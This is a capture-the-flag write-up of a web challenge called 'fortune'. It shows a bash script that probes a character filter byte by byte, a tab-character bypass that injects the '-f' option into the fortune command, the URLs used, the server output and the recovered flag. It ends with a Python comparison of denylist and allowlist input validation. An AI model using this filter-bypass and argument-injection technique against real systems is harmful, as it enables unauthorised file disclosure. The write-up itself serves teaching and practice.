Level 3 – fortune

Take a look into the source code:

[Screenshot: fortune form source code]

A simple GET form with an interesting comment:

<!-- fortune files are in fortunes/ directory -->

This is a clue!

As I didn’t know anything about fortune, I searched the WWW and found this:

fortune is a simple program that displays a pseudorandom message from a database of quotations that first appeared in Version 7 Unix.

Well, now it’s time to read fortune’s man page:

fortune(6) - Linux man page
Name

fortune - print a random, hopefully interesting, adage
Synopsis

fortune [-aefilosw] [-n length] [-m pattern] [[n%] file/dir/all]
Description

When fortune is run with no arguments it prints out a random epigram. Epigrams are divided into several categories.

Files

Note: these are the defaults as defined at compile time.

/usr/share/games/fortune
Directory for inoffensive fortunes.
/usr/share/games/fortune/off
Directory for offensive fortunes.

The user may specify alternate sayings. You can specify a specific file, a directory which contains one or more files, or the special word all which says to use all the standard databases. Any of these may be preceded by a percentage, which is a number n between 0 and 100 inclusive, followed by a %. If it is, there will be a n percent probability that an adage will be picked from that file or directory. If the percentages do not sum to 100, and there are specifications without percentages, the remaining percent will apply to those files and/or directories, in which case the probability of selecting from one of them will be based on their relative sizes.

After reading that, I thought: “This does the trick!”

If you look at the values which are submitted with each option in the SELECT tag:

fortunes/haxors
fortunes/cons

and join that information with the comment above, it seems clear that we are submitting the names of files inside the fortunes directory, which the fortune program then reads to produce its sayings. Aren’t we?

To confirm that, I tried these urls:

http://ctf.rs-labs.com:81/fortune_37df49e6961fb54f981713ee07586246/fortunes/haxors

and I got:

crg - "PeDrop" para los amigos
%
dab - "El melenas"
%
dreyer - El panda mas sexy
%
RoMaNSoFt - Tu pesadilla (el que ha programado este nivel, vamos)
%
Chema Alonso - Nuestro security-"pr0n"-star mas internacional
%
tomac & slay - Los chicos de Yersinia
%
zhodiac - 31337
%
matalaz - El amante de las ddbb
%
Mario Ballano - El reverser peligroso
%
uri - No hay reto que se le resista
%
Ero Carrera - Python + IDA powered
%
tora - Koreanas al poder
%
Ruben Santamarta - "Vendo 0day de IExplorer barato. Compren, compren"
%
Kachakil - "No duermo hasta que pase este nivel"
%

then:

http://ctf.rs-labs.com:81/fortune_37df49e6961fb54f981713ee07586246/fortunes/cons

getting:

RootedCON - La primera edicion promete...
%
NoConName - Todo un clasico
%
LaCon - El mejor pescaito
%
Undercon - Otro clasico
%

Now, how can I find more files in the fortunes directory?
fortune’s man page has the answer:

Options
-f Print out the list of files which would be searched, but don’t print a fortune.

Trying:

http://ctf.rs-labs.com:81/fortune_37df49e6961fb54f981713ee07586246/?fortune=-f%20fortunes%2F&Submit=Submit

We get:

Hacking attempt! (non-allowed chars)

Oops! A damn char filter!
Take it easy, we know how to test for non-filtered chars: send every byte value between -f and the path and keep the ones the filter does not reject.
This script does the job:

#!/bin/bash
#
# Probe every byte value 0-255 as the separator between "-f" and "fortunes/"
# and report the ones the character filter does not reject.
#
# Note: the byte is spliced into the URL raw, not percent-encoded, so bytes
# that are URL syntax ('#', '&', '?', '%') are interpreted by wget and the
# web server before the filter ever sees them; those hits are false positives.

URL="http://ctf.rs-labs.com:81/fortune_37df49e6961fb54f981713ee07586246/"

for N_CHAR in $(seq 0 255)
do
  HHD=$(printf '%X' "$N_CHAR")    # hex value of the byte, for the report
  HD=$(printf "\x$HHD")           # the byte itself
  CONTENTS=$(wget -O - "${URL}?fortune=-f${HD}fortunes/" 2>/dev/null)
  # The filter answers "Hacking attempt!"; anything else is worth a look.
  if ! echo "${CONTENTS}" | grep -Eq 'Hacking|invalid'
  then
    echo "Possible Solution: ${N_CHAR} / ${HHD} :"
    echo ${CONTENTS}              # unquoted on purpose: collapses the HTML onto one line
  fi
done

The script output:

Possible Solution: 9 / 9 :
<head>
<title>Fortune</title>
<link rel="stylesheet" type="text/css" href="http://www.rs-labs.com/rooted2010-ctf/green-hax0r-challenge.css" />
</head>
<body>
<center><h1>Fortune</h1> <h2>"La h4x0r-agenda"</h2></center>
<hr> A ver qu&eacute; te parece esta sugerencia... <br>
<pre>100.00% /var/ctfwww/fortune/fortune_37df49e6961fb54f981713ee07586246/fortunes/ 0.00% key-8b2f0453df4597c4e3cd92215bd2000e 0.00% haxors 100.00% nulos 0.00% cons </pre>
<a href="?">Volver</a> <hr>
</body>
Possible Solution: 35 / 23 :
<head>
<title>Fortune</title>
<link rel="stylesheet" type="text/css" href="http://www.rs-labs.com/rooted2010-ctf/green-hax0r-challenge.css" />
</head>
<body>
<center><h1>Fortune</h1> <h2>"La h4x0r-agenda"</h2></center>
<hr> A ver qu&eacute; te parece esta sugerencia... <br>
<pre>100.00% /usr/share/games/fortunes 31.87% literature 15.69% riddles 52.43% fortunes </pre>
<a href="?">Volver</a> <hr>
</body>
Possible Solution: 38 / 26 :
<head>
<title>Fortune</title>
<link rel="stylesheet" type="text/css" href="http://www.rs-labs.com/rooted2010-ctf/green-hax0r-challenge.css" />
</head>
<body>
<center><h1>Fortune</h1> <h2>"La h4x0r-agenda"</h2></center>
<hr> A ver qu&eacute; te parece esta sugerencia... <br>
<pre>100.00% /usr/share/games/fortunes 31.87% literature 15.69% riddles 52.43% fortunes </pre>
<a href="?">Volver</a> <hr>
</body>
Possible Solution: 109 / 6D :
<head>
<title>Fortune</title>
<link rel="stylesheet" type="text/css" href="http://www.rs-labs.com/rooted2010-ctf/green-hax0r-challenge.css" />
</head>
<body>
<center><h1>Fortune</h1> <h2>"La h4x0r-agenda"</h2></center>
<hr> A ver qu&eacute; te parece esta sugerencia... <br>
<pre></pre>
<a href="?">Volver</a> <hr>
</body>
Possible Solution: 110 / 6E :
<head>
<title>Fortune</title>
<link rel="stylesheet" type="text/css" href="http://www.rs-labs.com/rooted2010-ctf/green-hax0r-challenge.css" />
</head>
<body>
<center><h1>Fortune</h1> <h2>"La h4x0r-agenda"</h2></center>
<hr> A ver qu&eacute; te parece esta sugerencia... <br>
<pre>100.00% /usr/share/games/fortunes 31.87% literature 15.69% riddles 52.43% fortunes </pre>
<a href="?">Volver</a> <hr>
</body>
Possible Solution: 118 / 76 :
<head>
<title>Fortune</title>
<link rel="stylesheet" type="text/css" href="http://www.rs-labs.com/rooted2010-ctf/green-hax0r-challenge.css" />
</head>
<body>
<center><h1>Fortune</h1> <h2>"La h4x0r-agenda"</h2></center>
<hr> A ver qu&eacute; te parece esta sugerencia... <br>
<pre>fortune-mod version 9708 </pre>
<a href="?">Volver</a> <hr>
</body>

The allowed char %09 is a horizontal tab: the command line that runs fortune is split on tab just as on the filtered space, so fortunes/<tab>-f reaches fortune as the path followed by the -f option, and we get the files list:

http://ctf.rs-labs.com:81/fortune_37df49e6961fb54f981713ee07586246/?fortune=fortunes/%09-f&Submit=Submit
A ver qué te parece esta sugerencia...

100.00% /var/ctfwww/fortune/fortune_37df49e6961fb54f981713ee07586246/fortunes/
     0.00% key-8b2f0453df4597c4e3cd92215bd2000e
     0.00% haxors
    100.00% nulos
     0.00% cons

The key-8b2f0453df4597c4e3cd92215bd2000e file sounds promising, doesn’t it?

Building the right request…

http://ctf.rs-labs.com:81/fortune_37df49e6961fb54f981713ee07586246/?fortune=fortunes%2Fkey-8b2f0453df4597c4e3cd92215bd2000e&Submit=Submit

I got the Flag!

Enhorabuena. La pass es "Y0u_4r3_m0re_lucky_th4n_y0u_th0ught"
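As an added example (not part of the original writeup or the challenge code), the two validation strategies side by side in Python: a character denylist of the kind the "non-allowed chars" check implies, which the tab byte slips through, and an allowlist that maps the form value to an argv list so the program is run without a shell. The denylist contents, the base directory and the function names are assumptions.

```python
import os
import re

# Denylist in the spirit of the challenge's "non-allowed chars" check.
# Constructed assumption: the real filter's character set is not on the page.
DENIED_CHARS = set(" ;|&`$<>'\"\\")

def weak_filter(value: str) -> bool:
    """Blacklist check: True if no denied character is present.
    Space is denied, but horizontal tab (0x09) is not, and a shell running
    `fortune <value>` splits arguments on tab just as it does on space."""
    return not any(ch in DENIED_CHARS for ch in value)

# Allowlist approach: the form only ever offers these two files, so accept
# exactly those and build an argv list for subprocess.run(argv) with no shell.
ALLOWED_FILES = {"haxors", "cons"}
NAME_RE = re.compile(r"[A-Za-z0-9_]+")     # no '-', '/', '.', or whitespace
BASE_DIR = "/srv/fortune-app/fortunes"     # constructed path, not the real one

def fortune_argv(value: str) -> list:
    """Map the form value to ["fortune", <path>]; raise ValueError otherwise.
    A name can never start with '-' (so no option such as -f or -v can be
    injected) and is joined under BASE_DIR (so it cannot traverse out)."""
    prefix = "fortunes/"
    if not value.startswith(prefix):
        raise ValueError("unexpected form value")
    name = value[len(prefix):]
    if not NAME_RE.fullmatch(name) or name not in ALLOWED_FILES:
        raise ValueError("unknown fortune file")
    path = os.path.normpath(os.path.join(BASE_DIR, name))
    if os.path.dirname(path) != os.path.normpath(BASE_DIR):
        raise ValueError("path escapes the fortunes directory")
    return ["fortune", path]

def rejects(value: str) -> bool:
    """True if fortune_argv refuses the value (handy for checks)."""
    try:
        fortune_argv(value)
    except ValueError:
        return True
    return False
```

With the allowlist in place the key file is simply not reachable through the form, whatever separator the client sends.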
